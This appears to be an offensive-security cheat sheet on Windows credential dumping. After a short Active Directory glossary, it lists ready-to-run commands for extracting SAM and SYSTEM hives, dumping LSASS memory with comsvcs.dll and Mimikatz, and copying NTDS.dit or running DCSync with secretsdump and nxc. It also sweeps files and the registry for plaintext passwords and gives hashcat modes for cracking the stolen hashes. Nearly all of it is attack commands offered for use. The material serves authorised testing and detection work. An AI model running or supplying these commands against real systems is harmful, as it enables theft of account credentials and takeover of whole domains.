Credential Dumping
Extracting credentials from Windows systems involves three main targets: the SAM database (local accounts), LSASS process memory (active sessions), and NTDS.dit (all domain accounts). Each requires admin or SYSTEM context.
AD Concepts Primer
| Term | Description |
|---|---|
| DC | Domain Controller: runs AD DS, authenticates users, stores NTDS.dit |
| NTLM Hash | MD4(UTF-16LE(password)): used for authentication and offline cracking |
| TGT | Ticket Granting Ticket: encrypted with krbtgt hash, proves identity to the KDC |
| TGS | Ticket Granting Service: service ticket encrypted with the service account's hash |
| SPN | Service Principal Name: attribute linking an account to a Kerberos service |
| NTDS.dit | AD database on every DC: contains hashes for all domain accounts |
| SAM | Security Account Manager: local account database, only contains local users |
| LSASS | Local Security Authority Subsystem Service: holds plaintext creds and hashes in memory |
| AS-REP | Authentication Service Response: returned by KDC in step 1 of Kerberos auth |
| DCC2 | Domain Cached Credentials v2 (MS-CACHE2): stored locally when DC is unreachable |
SAM Database
The SAM database stores local account hashes. Requires SYSTEM context: save both SAM and SYSTEM hives since the SYSTEM hive contains the boot key needed to decrypt SAM.
cmd
# Save hives (requires admin → SYSTEM via token impersonation)
reg save HKLM\SAM C:\Temp\sam.bak
reg save HKLM\SYSTEM C:\Temp\system.bak
reg save HKLM\SECURITY C:\Temp\security.bakbash
# Offline dump on Linux
secretsdump.py -sam sam.bak -system system.bak LOCAL
# Remote: directly against target
secretsdump.py domain/user:pass@<ip>
secretsdump.py domain/user@<ip> -hashes :<NThash>bash
# nxc: dumps SAM remotely
nxc smb <ip> -u user -p pass --sam
nxc smb <ip> -u user -H <NThash> --samLSASS Dump
LSASS caches credentials for active sessions: NTLM hashes, Kerberos tickets, and sometimes plaintext passwords (Wdigest). Requires SYSTEM or SeDebugPrivilege.
powershell
# Task Manager (GUI): least suspicious
# Task Manager → Details tab → right-click lsass.exe → Create dump file
# File lands in C:\Users\<user>\AppData\Local\Temp\lsass.DMP
# comsvcs.dll: pure LOLBin, no additional tooling
$pid = (Get-Process lsass).Id
rundll32 C:\Windows\System32\comsvcs.dll MiniDump $pid C:\Windows\Temp\lsass.dmp full
# Mimikatz: interactive dump on target
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::tickets /exportbash
# Parse dump offline on Linux
pypykatz lsa minidump lsass.dmp
pypykatz lsa minidump lsass.dmp -o output.jsonNTDS.dit
The domain database containing hashes for every domain account. Only on DCs: requires DC admin rights or DS-Replication privileges.
cmd
# ntdsutil IFM: official Windows tool, quiet
ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\IFM" quit quit
# VSS shadow copy: bypasses file locks
vssadmin create shadow /for=C:
# Note the shadow copy device path (e.g. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM
vssadmin delete shadows /shadow=<ShadowID> /quietbash
# Parse offline
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -just-dc-user administrator
# DCSync: simulates replication, doesn't touch NTDS.dit file
secretsdump.py domain/user:pass@<dc-ip>
secretsdump.py domain/user:pass@<dc-ip> -just-dc-user krbtgt
secretsdump.py domain/user:pass@<dc-ip> -just-dc # all hashes
# nxc
nxc smb <dc-ip> -u user -p pass --ntdsCredential Hunting in Files
Credentials left in config files, scripts, and the registry are common on real engagements: worth sweeping before reaching for heavier tooling.
powershell
# Broad sweep for "password" keyword
findstr /si password *.txt *.xml *.ini *.config *.ps1 *.bat
# Unattend.xml: sysprep leftover, often contains plaintext admin password
Get-ChildItem -Path C:\ -Include Unattend.xml,sysprep.xml,sysprep.inf -Recurse -ErrorAction SilentlyContinue
# Common Unattend locations
# C:\Windows\Panther\Unattend.xml
# C:\Windows\Panther\Unattend\Unattend.xml
# C:\Windows\sysprep\sysprep.xml
# web.config: IIS app credentials
Get-ChildItem -Path C:\inetpub -Include web.config -Recurse -ErrorAction SilentlyContinue | Select-String password
# GPP cPassword: Group Policy Preferences (SYSVOL, pre-MS14-025)
Get-ChildItem -Path "\\<DC>\SYSVOL" -Recurse -Include Groups.xml,Services.xml,ScheduledTasks.xml -ErrorAction SilentlyContinue |
Select-String "cpassword"bash
# Decrypt GPP cPassword on Linux (AES key is publicly known)
gpp-decrypt <cpassword_value>powershell
# Registry autologon: plaintext credentials stored for automatic login
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Look for: DefaultPassword, DefaultUsername, DefaultDomainName
# PowerShell command history
Get-Content "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
# Windows Credential Manager
cmdkey /list
vaultcmd /listcreds:"Windows Credentials"Hashcat Quick Reference
| Hash Type | Hashcat Mode |
|---|---|
| NTLM | 1000 |
| DCC2 / MS-CACHE2 | 2100 |
| NetNTLMv1 | 5500 |
| NetNTLMv2 | 5600 |
| Kerberoast RC4 (etype 23) | 13100 |
| Kerberoast AES256 (etype 18) | 19700 |
| AS-REP Roast | 18200 |
| JWT | 16500 |